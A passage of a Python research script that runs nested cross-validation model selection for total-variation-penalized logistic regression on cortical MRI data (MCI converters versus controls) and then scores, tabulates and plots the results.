.\ncp ../MCIc-CTL-FS/mask.npy .\ncp ../MCIc-CTL-FS/lrh.pial.gii .\n\n\n# Start by running Locally with 2 cores, to check that everything os OK)\nInterrupt after a while CTL-C\nmapreduce.py --map /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/config_modselectcv.json --ncore 2\n# 1) Log on gabriel:\nssh -t gabriel.intra.cea.fr\n# 2) Run one Job to test\nqsub -I\ncd /neurospin/tmp/ed203246/MCIc-CTL-FS_cs_modselectcv\n./job_Global_long.pbs\n# 3) Run on cluster\nqsub job_Global_long.pbs\n# 4) Log out and pull Pull\nexit\n/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/sync_pull.sh\n# Reduce\nmapreduce.py --reduce /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/config_modselectcv.json\n\n\n%run -i ~/git/scripts/2013_adni/MCIc-CTL-FS/03_tvenet_modselectcv_cs.py\n\n\"\"\"\n\nimport os\nimport json\nimport numpy as np\nfrom collections import OrderedDict\nfrom sklearn.cross_validation import StratifiedKFold\nimport nibabel\nfrom sklearn.metrics import roc_auc_score, precision_recall_fscore_support\nfrom sklearn.feature_selection import SelectKBest\nfrom parsimony.estimators import LogisticRegressionL1L2TV\nimport parsimony.functions.nesterov.tv as tv_helper\nfrom brainomics import array_utils\nfrom scipy.stats import binom_test\n\nimport mapreduce\nfrom statsmodels.stats.inter_rater import fleiss_kappa\n\nNFOLDS_INNER, NFOLDS_OUTER = 5, 5\npenalty_start = 2\n\nWD = \"/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv\"\ndef config_filename(): return os.path.join(WD, \"config_modselectcv.json\")\ndef results_filenane(): return os.path.join(WD, \"MCIc-CTL-FS_cs_modselectcv.xlsx\")\n\n# for comparision we need the results with spatially smoothed data\nWD_s = \"/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_s_modselectcv\"\ndef config_filename_s(): return os.path.join(WD_s, \"config_modselectcv.json\")\ndef results_filenane_s(): return os.path.join(WD_s, \"MCIc-CTL-FS_cs_s_modselectcv.xlsx\")\n\ndef init():\n INPUT_DATA_X = os.path.join('X.npy')\n INPUT_DATA_y = os.path.join('y.npy')\n STRUCTURE = dict(mesh=\"lrh.pial.gii\", mask=\"mask.npy\")\n #WD = os.path.join(WD, 'logistictvenet_5cv')\n if not os.path.exists(WD):\n os.makedirs(WD)\n\n os.chdir(WD)\n\n #############################################################################\n ## Create config file\n y = np.load(INPUT_DATA_y)\n X = np.load(INPUT_DATA_X)\n from parsimony.utils.penalties import l1_max_logistic_loss\n assert l1_max_logistic_loss(X[:, 3:], y) == 0.23271180133879535\n if os.path.exists(\"config_modselectcv.json\"):\n old_conf = json.load(open(\"config_modselectcv.json\"))\n cv = old_conf[\"resample\"]\n else:\n cv_outer = [[tr, te] for tr,te in StratifiedKFold(y.ravel(), n_folds=NFOLDS_OUTER, random_state=42)]\n \"\"\"\n cv_outer = [[np.array(tr), np.array(te)] for tr,te in json.load(open(\"/neurospin/brainomics/2013_adni/MCIc-CTL-FS/config_5cv.json\", \"r\"))[\"resample\"][1:]]\n \"\"\"\n import collections\n cv = collections.OrderedDict()\n for cv_outer_i, (tr_val, te) in enumerate(cv_outer):\n cv[\"cv%02d/refit\" % cv_outer_i] = [tr_val, te]\n cv_inner = StratifiedKFold(y[tr_val].ravel(), n_folds=NFOLDS_INNER, random_state=42)\n for cv_inner_i, (tr, val) in enumerate(cv_inner):\n cv[\"cv%02d/cvnested%02d\" % (cv_outer_i, cv_inner_i)] = [tr_val[tr], tr_val[val]]\n\n for k in cv:\n cv[k] = [cv[k][0].tolist(), cv[k][1].tolist()]\n\n print(cv.keys())\n # Some QC\n N = float(len(y)); p0 = np.sum(y==0) / N; p1 = np.sum(y==1) / N;\n for k in cv:\n tr, val = cv[k]\n tr, val = np.array(tr), np.array(val)\n print(k, \"\\t: tr+val=\", len(tr) + len(val))\n assert not set(tr).intersection(val)\n assert abs(np.sum(y[tr]==0)/float(len(y[tr])) - p0) < 0.01\n assert abs(np.sum(y[tr]==1)/float(len(y[tr])) - p1) < 0.01\n if k.count(\"refit\"):\n te = val\n assert len(tr) + len(te) == len(y)\n assert abs(len(y[tr])/N - (1 - 1./NFOLDS_OUTER)) < 0.01\n else:\n te = np.array(cv[k.split(\"/\")[0] + \"/refit\"])[1]\n assert abs(len(y[tr])/N - (1 - 1./NFOLDS_OUTER) * (1 - 1./NFOLDS_INNER)) < 0.01\n assert not set(tr).intersection(te)\n assert not set(val).intersection(te)\n len(tr) + len(val) + len(te) == len(y)\n\n tv_ratios = [0., .2, .8]\n l1_ratios = [np.array([1., .1, .9, 1]),\n np.array([1., .01, .99, 1]),\n np.array([1., .9, .1, 1])] # [alpha, l1 l2 tv]\n alphas_l1l2tv = [.01, .1]\n alphas_l2tv = [round(alpha, 10) for alpha in 10. ** np.arange(-2, 4)]\n k_range = [-1]\n l1l2tv =[np.array([alpha, float(1-tv), float(1-tv), tv]) * l1_ratio\n for alpha in alphas_l1l2tv for tv in tv_ratios for l1_ratio in l1_ratios]\n # specific case for without l1 since it supports larger penalties\n l2tv =[np.array([alpha, 0., float(1-tv), tv])\n for alpha in alphas_l2tv for tv in tv_ratios]\n params = l1l2tv + l2tv\n params = [param.tolist() + [k] for k in k_range for param in params]\n params = {\"_\".join([str(p) for p in param]):param for param in params}\n assert len(params) == 36\n user_func_filename = os.path.join(os.environ[\"HOME\"],\n \"git\", \"scripts\", \"2013_adni\", \"MCIc-CTL-FS\",\n \"03_tvenet_modselectcv_cs.py\")\n #print __file__, os.path.abspath(__file__)\n print(\"user_func\", user_func_filename)\n #import sys\n #sys.exit(0)\n # Use relative path from config.json\n config = dict(data=dict(X=INPUT_DATA_X, y=INPUT_DATA_y),\n params=params, resample=cv,\n structure=STRUCTURE,\n penalty_start = penalty_start,\n map_output=\"modselectcv\",\n user_func=user_func_filename,\n #reduce_input=\"rndperm/*/*\",\n reduce_group_by=\"user_defined\",\n reduce_output=\"MCIc-CTL-FS_cs_modselectcv.csv\")\n json.dump(config, open(os.path.join(WD, \"config_modselectcv.json\"), \"w\"))\n\n #############################################################################\n # Build utils files: sync (push/pull) and PBS\n import brainomics.cluster_gabriel as clust_utils\n sync_push_filename, sync_pull_filename, WD_CLUSTER = \\\n clust_utils.gabriel_make_sync_data_files(WD)\n cmd = \"mapreduce.py --map %s/config_modselectcv.json\" % WD_CLUSTER\n clust_utils.gabriel_make_qsub_job_files(WD, cmd)\n #############################################################################\n # Sync to cluster\n print(\"Sync data to gabriel.intra.cea.fr: \")\n os.system(sync_push_filename)\n #############################################################################\n print(\"# Start by running Locally with 2 cores, to check that everything os OK)\")\n print(\"Interrupt after a while CTL-C\")\n print(\"mapreduce.py --map %s/config_modselectcv.json --ncore 2\" % WD)\n #os.system(\"mapreduce.py --mode map --config %s/config.json\" % WD)\n print(\"# 1) Log on gabriel:\")\n print('ssh -t gabriel.intra.cea.fr')\n print(\"# 2) Run one Job to test\")\n print(\"qsub -I\")\n print(\"cd %s\" % WD_CLUSTER)\n print(\"./job_Global_long.pbs\")\n print(\"# 3) Run on cluster\")\n print(\"qsub job_Global_long.pbs\")\n print(\"# 4) Log out and pull Pull\")\n print(\"exit\")\n print(sync_pull_filename)\n #############################################################################\n print(\"# Reduce\")\n print(\"mapreduce.py --reduce %s/config_modselectcv.json\" % WD)\n\n\ndef load_globals(config):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n import brainomics.mesh_processing as mesh_utils\n mesh_coord, mesh_triangles = mesh_utils.mesh_arrays(config[\"structure\"][\"mesh\"])\n mask = np.load(config[\"structure\"][\"mask\"])\n GLOBAL.mesh_coord, GLOBAL.mesh_triangles, GLOBAL.mask = mesh_coord, mesh_triangles, mask\n try:\n A = tv_helper.linear_operator_from_mesh(GLOBAL.mesh_coord, GLOBAL.mesh_triangles, GLOBAL.mask)\n except:\n A, _ = tv_helper.nesterov_linear_operator_from_mesh(GLOBAL.mesh_coord, GLOBAL.mesh_triangles, GLOBAL.mask)\n GLOBAL.A = A\n GLOBAL.CONFIG = config\n\ndef resample(config, resample_nb):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n resample = config[\"resample\"][resample_nb]\n if resample is not None:\n GLOBAL.DATA_RESAMPLED = {k: [GLOBAL.DATA[k][idx, ...] for idx in resample]\n for k in GLOBAL.DATA}\n else: # resample is None train == test\n GLOBAL.DATA_RESAMPLED = {k: [GLOBAL.DATA[k] for idx in [0, 1]]\n for k in GLOBAL.DATA}\n\ndef mapper(key, output_collector):\n import mapreduce as GLOBAL # access to global variables:\n #raise ImportError(\"could not import \")\n # GLOBAL.DATA, GLOBAL.STRUCTURE, GLOBAL.A\n # GLOBAL.DATA ::= {\"X\":[Xtrain, ytrain], \"y\":[Xtest, ytest]}\n # key: list of parameters\n Xtr = GLOBAL.DATA_RESAMPLED[\"X\"][0]\n Xte = GLOBAL.DATA_RESAMPLED[\"X\"][1]\n ytr = GLOBAL.DATA_RESAMPLED[\"y\"][0]\n yte = GLOBAL.DATA_RESAMPLED[\"y\"][1]\n print(key, \"Data shape:\", Xtr.shape, Xte.shape, ytr.shape, yte.shape)\n # STRUCTURE = GLOBAL.STRUCTURE\n #alpha, ratio_l1, ratio_l2, ratio_tv, k = key\n #key = np.array(key)\n class_weight=\"auto\" # unbiased\n alpha = float(key[0])\n l1, l2, tv, k = alpha * float(key[1]), alpha * float(key[2]), alpha * float(key[3]), key[4]\n print(\"l1:%f, l2:%f, tv:%f, k:%i\" % (l1, l2, tv, k))\n if k != -1:\n k = int(k)\n aov = SelectKBest(k=k)\n aov.fit(Xtr[..., penalty_start:], ytr.ravel())\n mask = GLOBAL.mask != 0\n mask[mask] = aov.get_support()\n #print mask.sum()\n A, _ = tv_helper.nesterov_linear_operator_from_mesh(GLOBAL.mesh_coord, GLOBAL.mesh_triangles, mask)\n Xtr_r = np.hstack([Xtr[:, :penalty_start], Xtr[:, penalty_start:][:, aov.get_support()]])\n Xte_r = np.hstack([Xte[:, :penalty_start], Xte[:, penalty_start:][:, aov.get_support()]])\n else:\n mask = np.ones(Xtr.shape[0], dtype=bool)\n Xtr_r = Xtr\n Xte_r = Xte\n A = GLOBAL.A\n mod = LogisticRegressionL1L2TV(l1, l2, tv, A, penalty_start=penalty_start,\n class_weight=class_weight)\n mod.fit(Xtr_r, ytr)\n y_pred = mod.predict(Xte_r)\n proba_pred = mod.predict_probability(Xte_r)\n ret = dict(y_pred=y_pred, y_true=yte, beta=mod.beta, mask=mask, proba_pred=proba_pred)\n if output_collector:\n output_collector.collect(key, ret)\n else:\n return ret\n###############################################################################\n## 2017\n###############################################################################\ndef scores(key, paths, config, as_dataframe=False):\n import mapreduce\n print(key)\n if (len(paths) != NFOLDS_INNER) or (len(paths) != NFOLDS_OUTER):\n print(\"Failed for key %s\" % key)\n return None\n values = [mapreduce.OutputCollector(p) for p in paths]\n values = [item.load() for item in values]\n y_true = [item[\"y_true\"].ravel() for item in values]\n y_pred = [item[\"y_pred\"].ravel() for item in values]\n y_true = np.concatenate(y_true)\n y_pred = np.concatenate(y_pred)\n prob_pred = [item[\"proba_pred\"].ravel() for item in values]\n prob_pred = np.concatenate(prob_pred)\n\n # Prediction performances\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n auc = roc_auc_score(y_true, prob_pred) #area under curve score.\n\n # P-values\n success = r * s\n success = success.astype('int')\n prob_class1 = np.count_nonzero(y_true) / float(len(y_true))\n pvalue_recall0_true_prob = binom_test(success[0], s[0], 1 - prob_class1,alternative = 'greater')\n pvalue_recall1_true_prob = binom_test(success[1], s[1], prob_class1,alternative = 'greater')\n pvalue_recall0_unknwon_prob = binom_test(success[0], s[0], 0.5,alternative = 'greater')\n pvalue_recall1_unknown_prob = binom_test(success[1], s[1], 0.5,alternative = 'greater')\n pvalue_recall_mean = binom_test(success[0]+success[1], s[0] + s[1], p=0.5,alternative = 'greater')\n\n\n # Beta's measures of similarity\n betas = np.hstack([item[\"beta\"][penalty_start:, :] for item in values]).T\n\n # Correlation\n R = np.corrcoef(betas)\n #print R\n R = R[np.triu_indices_from(R, 1)]\n # Fisher z-transformation / average\n z_bar = np.mean(1. / 2. * np.log((1 + R) / (1 - R)))\n # bracktransform\n r_bar = (np.exp(2 * z_bar) - 1) / (np.exp(2 * z_bar) + 1)\n\n # threshold betas to compute fleiss_kappa and DICE\n try:\n betas_t = np.vstack([array_utils.arr_threshold_from_norm2_ratio(betas[i, :], .99)[0] for i in range(betas.shape[0])])\n #print \"--\", np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1))\n #print(np.allclose(np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1)), [0.99]*5,\n # rtol=0, atol=1e-02))\n\n # Compute fleiss kappa statistics\n beta_signed = np.sign(betas_t)\n table = np.zeros((beta_signed.shape[1], 3))\n table[:, 0] = np.sum(beta_signed == 0, 0)\n table[:, 1] = np.sum(beta_signed == 1, 0)\n table[:, 2] = np.sum(beta_signed == -1, 0)\n fleiss_kappa_stat = fleiss_kappa(table)\n\n # Paire-wise Dice coeficient\n ij = [[i, j] for i in range(betas.shape[0]) for j in range(i+1, betas.shape[0])]\n dices = list()\n for idx in ij:\n A, B = beta_signed[idx[0], :], beta_signed[idx[1], :]\n dices.append(float(np.sum((A == B)[(A != 0) & (B != 0)])) / (np.sum(A != 0) + np.sum(B != 0)))\n dice_bar = np.mean(dices)\n except:\n dice_bar = fleiss_kappa_stat = 0\n\n scores = OrderedDict()\n scores['key'] = key\n try:\n a, l1, l2 , tv, k = [float(par) for par in key.split(\"_\")]\n print(a, l1, l2 , tv)\n scores['a'] = a\n scores['l1'] = l1\n scores['l2'] = l2\n scores['tv'] = tv\n left = float(1 - tv)\n if left == 0: left = 1.\n scores['l1_ratio'] = float(l1) / left\n except:\n pass\n scores['recall_0'] = r[0]\n scores['recall_1'] = r[1]\n scores['recall_mean'] = r.mean()\n scores[\"auc\"] = auc\n scores['pvalue_recall0_true_prob_one_sided'] = pvalue_recall0_true_prob\n scores['pvalue_recall1_true_prob_one_sided'] = pvalue_recall1_true_prob\n scores['pvalue_recall0_unknwon_prob_one_sided'] = pvalue_recall0_unknwon_prob\n scores['pvalue_recall1_unknown_prob_one_sided'] = pvalue_recall1_unknown_prob\n scores['pvalue_recall_mean'] = pvalue_recall_mean\n scores['prop_non_zeros_mean'] = float(np.count_nonzero(betas_t)) / \\\n float(np.prod(betas.shape))\n scores['beta_r_bar'] = r_bar\n scores['beta_fleiss_kappa'] = fleiss_kappa_stat\n scores['beta_dice_bar'] = dice_bar\n\n scores['beta_dice'] = str(dices)\n scores['beta_r'] = str(R)\n\n if as_dataframe:\n scores = pd.DataFrame([list(scores.values())], columns=list(scores.keys()))\n\n return scores\n\n\ndef reducer(key, values):\n import os, glob, pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n paths = glob.glob(os.path.join(config['map_output'], \"*\", \"*\", \"*\"))\n param_config_set = set([mapreduce.dir_from_param_list(p) for p in config['params']])\n assert len(paths) / len(param_config_set) == len(config['resample']), \"Nb run per param is not the one excpected\"\n paths.sort()\n assert len(paths) == 1080\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n def groupby_paths(paths, pos):\n groups = {g:[] for g in set([p.split(\"/\")[pos] for p in paths])}\n for p in paths:\n groups[p.split(\"/\")[pos]].append(p)\n return groups\n\n def argmaxscore_bygroup(data, groupby='fold', param_key=\"key\", score=\"recall_mean\"):\n arg_max_byfold = list()\n for fold, data_fold in data.groupby(groupby):\n assert len(data_fold) == len(set(data_fold[param_key])) # ensure all param are diff\n arg_max_byfold.append([fold, data_fold.ix[data_fold[score].argmax()][param_key], data_fold[score].max()])\n return pd.DataFrame(arg_max_byfold, columns=[groupby, param_key, score])\n\n print('## Refit scores: cv*/refit/*')\n print('## -------------------------')\n byparams = groupby_paths([p for p in paths if not p.count(\"cvnested\") and not p.count(\"refit/refit\") ], 3)\n # k=\"1.0_0.7_0.0_0.3\"; v=byparams[key]\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n byparams_scores = {k: v for k, v in byparams_scores.items() if v is not None}\n\n data = [list(byparams_scores[k].values()) for k in byparams_scores]\n columns = list(byparams_scores[list(byparams_scores.keys())[0]].keys())\n scores_refit = pd.DataFrame(data, columns=columns)\n\n print('## doublecv scores by outer-cv and by params: cv*/cvnested*/*')\n print('## -----------------------------------------')\n data = list()\n bycv = groupby_paths([p for p in paths if p.count(\"cvnested\") and not p.count(\"refit/cvnested\") ], 1)\n for fold, paths_fold in bycv.items():\n print(fold)\n byparams = groupby_paths([p for p in paths_fold], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n byparams_scores = {k: v for k, v in byparams_scores.items() if v is not None}\n data += [[fold] + list(byparams_scores[k].values()) for k in byparams_scores]\n scores_dcv_byparams = pd.DataFrame(data, columns=[\"fold\"] + columns)\n assert np.all(np.array([g.shape[0] for d, g in scores_dcv_byparams.groupby('fold')]) == 136)\n\n # Different settings\n\n l1l2tv_all = scores_dcv_byparams\n\n l1l2tv_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1) | close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0.2) | close(scores_dcv_byparams.tv, 0.8))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2tv_reduced.groupby('fold')]) == 8)\n assert l1l2tv_reduced.shape[0] == 40\n\n l1l2tv_ridge_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1)) &\n (close(scores_dcv_byparams.tv, 0.2) | close(scores_dcv_byparams.tv, 0.8))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2tv_ridge_reduced.groupby('fold')]) == 4)\n assert l1l2tv_ridge_reduced.shape[0] == 20\n\n l1l2tv_lasso_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0.2) | close(scores_dcv_byparams.tv, 0.8))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2tv_lasso_reduced.groupby('fold')]) == 4)\n assert l1l2tv_lasso_reduced.shape[0] == 20\n\n l1l2_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1) | close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2_reduced.groupby('fold')]) == 4)\n assert l1l2_reduced.shape[0] == 20\n\n l1l2_ridge_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1)) &\n (close(scores_dcv_byparams.tv, 0))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2_ridge_reduced.groupby('fold')]) == 2)\n assert l1l2_ridge_reduced.shape[0] == 10\n\n l1l2_lasso_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2_lasso_reduced.groupby('fold')]) == 2)\n assert l1l2_lasso_reduced.shape[0] == 10\n\n print('## Model selection')\n print('## ---------------')\n l1l2tv_all = argmaxscore_bygroup(l1l2tv_all); l1l2tv_all[\"method\"] = \"l1l2tv_all\"\n\n l1l2tv_reduced = argmaxscore_bygroup(l1l2tv_reduced); l1l2tv_reduced[\"method\"] = \"l1l2tv_reduced\"\n\n l1l2tv_ridge_reduced = argmaxscore_bygroup(l1l2tv_ridge_reduced); l1l2tv_ridge_reduced[\"method\"] = \"l1l2tv_ridge_reduced\"\n\n l1l2tv_lasso_reduced = argmaxscore_bygroup(l1l2tv_lasso_reduced); l1l2tv_lasso_reduced[\"method\"] = \"l1l2tv_lasso_reduced\"\n\n l1l2_reduced = argmaxscore_bygroup(l1l2_reduced); l1l2_reduced[\"method\"] = \"l1l2_reduced\"\n\n l1l2_ridge_reduced = argmaxscore_bygroup(l1l2_ridge_reduced); l1l2_ridge_reduced[\"method\"] = \"l1l2_ridge_reduced\"\n\n l1l2_lasso_reduced = argmaxscore_bygroup(l1l2_lasso_reduced); l1l2_lasso_reduced[\"method\"] = \"l1l2_lasso_reduced\"\n\n scores_argmax_byfold = pd.concat([l1l2tv_all,\n l1l2tv_reduced, l1l2_reduced,\n l1l2tv_ridge_reduced, l1l2_ridge_reduced,\n l1l2tv_lasso_reduced, l1l2_lasso_reduced])\n\n print('## Apply best model on refited')\n print('## ---------------------------')\n l1l2tv_all = scores(\"l1l2tv_all\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_all.iterrows()],\n config, as_dataframe=True)\n\n l1l2tv_reduced = scores(\"l1l2tv_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2tv_ridge_reduced = scores(\"l1l2tv_ridge_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_ridge_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2tv_lasso_reduced = scores(\"l1l2tv_lasso_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_lasso_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2_reduced = scores(\"l1l2_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2_ridge_reduced = scores(\"l1l2_ridge_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2_ridge_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2_lasso_reduced = scores(\"l1l2_lasso_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2_lasso_reduced.iterrows()],\n config, as_dataframe=True)\n\n scores_cv = pd.concat([l1l2tv_all,\n l1l2tv_reduced, l1l2_reduced,\n l1l2tv_ridge_reduced, l1l2_ridge_reduced,\n l1l2tv_lasso_reduced, l1l2_lasso_reduced,\n ])\n\n with pd.ExcelWriter(results_filename()) as writer:\n scores_refit.to_excel(writer, sheet_name='cv_by_param', index=False)\n scores_dcv_byparams.to_excel(writer, sheet_name='cv_cv_byparam', index=False)\n scores_argmax_byfold.to_excel(writer, sheet_name='cv_argmax', index=False)\n scores_cv.to_excel(writer, sheet_name='dcv', index=False)\n\n\n###############################################################################\ndef plot_scores():\n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n from matplotlib.backends.backend_pdf import PdfPages\n import seaborn as sns\n\n input_filename = results_filename()\n outut_filename = input_filename.replace(\".xlsx\", \"_scores-by-tv.pdf\")\n\n # scores\n y_cols = ['recall_mean', 'auc', 'beta_r_bar', 'beta_fleiss_kappa', 'beta_dice_bar']\n x_col = 'tv'\n\n # colors\n #sns.palplot(sns.color_palette(\"Paired\"))\n pal = sns.color_palette(\"Paired\")\n colors = {(0.01, 0.1):pal[0],\n (0.1, 0.1):pal[1],\n (0.01, 0.9):pal[4],\n (0.1, 0.9):pal[5]}\n\n data = pd.read_excel(input_filename, sheetname='cv_by_param')\n # avoid poor rounding\n data.l1_ratio = np.asarray(data.l1_ratio).round(3); assert len(data.l1_ratio.unique()) == 5\n data.tv = np.asarray(data.tv).round(5); assert len(data.tv.unique()) == 11\n data.a = np.asarray(data.a).round(5); assert len(data.a.unique()) == 3\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n data = data[close(data.l1_ratio, .1) | close(data.l1_ratio, .9)]\n data = data[close(data.a, .01) | close(data.a, .1)]\n data.sort_values(by=x_col, ascending=True, inplace=True)\n\n pdf = PdfPages(outut_filename)\n\n for y_col in y_cols:\n #y_col = y_cols[0]\n fig=plt.figure()\n for (l1, a), d in data.groupby([\"l1_ratio\", \"a\"]):\n print((a, l1))\n plt.plot(d.tv, d[y_col], color=colors[(a,l1)], label=\"a:%.2f, l1/l2:%.1f\" % (a, l1))\n plt.xlabel(x_col)\n plt.ylabel(y_col)\n plt.suptitle(y_col)\n plt.legend()\n pdf.savefig(fig); plt.clf()\n pdf.close()\n\n\n###############################################################################\n## 2015\n###############################################################################\n\ndef scores_2015(key, paths, config, ret_y=False):\n import glob, mapreduce\n print(key)\n values = [mapreduce.OutputCollector(p) for p in paths]\n values = [item.load() for item in values]\n recall_mean_std = np.std([np.mean(precision_recall_fscore_support(\n item[\"y_true\"].ravel(), item[\"y_pred\"])[1]) for item in values]) / np.sqrt(len(values))\n y_true = [item[\"y_true\"].ravel() for item in values]\n y_pred = [item[\"y_pred\"].ravel() for item in values]\n prob_pred = [item[\"proba_pred\"].ravel() for item in values]\n y_true = np.concatenate(y_true)\n y_pred = np.concatenate(y_pred)\n prob_pred = np.concatenate(prob_pred)\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n auc = roc_auc_score(y_true, prob_pred) #area under curve score.\n n_ite = None\n betas = np.hstack([item[\"beta\"][config['penalty_start']:, :] for item in values]).T\n #betas = np.hstack([item[\"beta\"] for item in values]).T\n ## Compute beta similarity measures\n # Correlation\n R = np.corrcoef(betas)\n #print R\n R = R[np.triu_indices_from(R, 1)]\n # Fisher z-transformation / average\n z_bar = np.mean(1. / 2. * np.log((1 + R) / (1 - R)))\n # bracktransform\n r_bar = (np.exp(2 * z_bar) - 1) / (np.exp(2 * z_bar) + 1)\n\n # threshold betas to compute fleiss_kappa and DICE\n try:\n betas_t = np.vstack([array_utils.arr_threshold_from_norm2_ratio(betas[i, :], .99)[0] for i in xrange(betas.shape[0])])\n #print \"--\", np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1))\n print(np.allclose(np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1)), [0.99]*5,\n rtol=0, atol=1e-02))\n\n # Compute fleiss kappa statistics\n beta_signed = np.sign(betas_t)\n table = np.zeros((beta_signed.shape[1], 3))\n table[:, 0] = np.sum(beta_signed == 0, 0)\n table[:, 1] = np.sum(beta_signed == 1, 0)\n table[:, 2] = np.sum(beta_signed == -1, 0)\n fleiss_kappa_stat = fleiss_kappa(table)\n\n # Paire-wise Dice coeficient\n ij = [[i, j] for i in xrange(5) for j in xrange(i+1, 5)]\n #print [[idx[0], idx[1]] for idx in ij]\n dices = list()\n for idx in ij:\n A, B = beta_signed[idx[0], :], beta_signed[idx[1], :]\n dices.append(float(np.sum((A == B)[(A != 0) & (B != 0)])) / (np.sum(A != 0) + np.sum(B != 0)))\n dice_bar = np.mean(dices)\n except:\n dice_bar = fleiss_kappa_stat = 0.\n\n #a, l1, l2 , tv , k = [float(par) for par in key.split(\"_\")]\n scores = OrderedDict()\n try:\n a, l1, l2 , tv , k = [float(par) for par in key.split(\"_\")]\n scores['a'] = a\n scores['l1'] = l1\n scores['l2'] = l2\n scores['tv'] = tv\n left = float(1 - tv)\n if left == 0: left = 1.\n scores['l1_ratio'] = float(l1) / left\n scores['k'] = k\n except:\n pass\n scores['recall_0'] = r[0]\n scores['recall_1'] = r[1]\n scores['recall_mean'] = r.mean()\n scores['recall_mean_std'] = recall_mean_std\n scores['auc'] = auc\n# scores['beta_cor_mean'] = beta_cor_mean\n scores['precision_0'] = p[0]\n scores['precision_1'] = p[1]\n scores['precision_mean'] = p.mean()\n scores['f1_0'] = f[0]\n scores['f1_1'] = f[1]\n scores['f1_mean'] = f.mean()\n scores['support_0'] = s[0]\n scores['support_1'] = s[1]\n# scores['corr']= corr\n scores['beta_r'] = str(R)\n scores['beta_r_bar'] = r_bar\n scores['beta_fleiss_kappa'] = fleiss_kappa_stat\n scores['beta_dice'] = str(dices)\n scores['beta_dice_bar'] = dice_bar\n scores['n_ite'] = n_ite\n scores['param_key'] = key\n if ret_y:\n scores[\"y_true\"], scores[\"y_pred\"], scores[\"prob_pred\"] = y_true, y_pred, prob_pred\n return scores\n\ndef reducer_2015():\n import os, glob, pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n paths = glob.glob(os.path.join(config['map_output'], \"*\", \"*\", \"*\"))\n #paths = [p for p in paths if not p.count(\"0.8_-1\")]\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n def groupby_paths(paths, pos):\n groups = {g:[] for g in set([p.split(\"/\")[pos] for p in paths])}\n for p in paths:\n groups[p.split(\"/\")[pos]].append(p)\n return groups\n\n def argmaxscore_bygroup(data, groupby='fold', arg=\"param_key\", score=\"recall_mean\"):\n arg_max_byfold = list()\n for fold, data_fold in data.groupby(groupby):\n assert len(data_fold) == len(set(data_fold[arg])) # ensure all param are diff\n arg_max_byfold.append([fold, 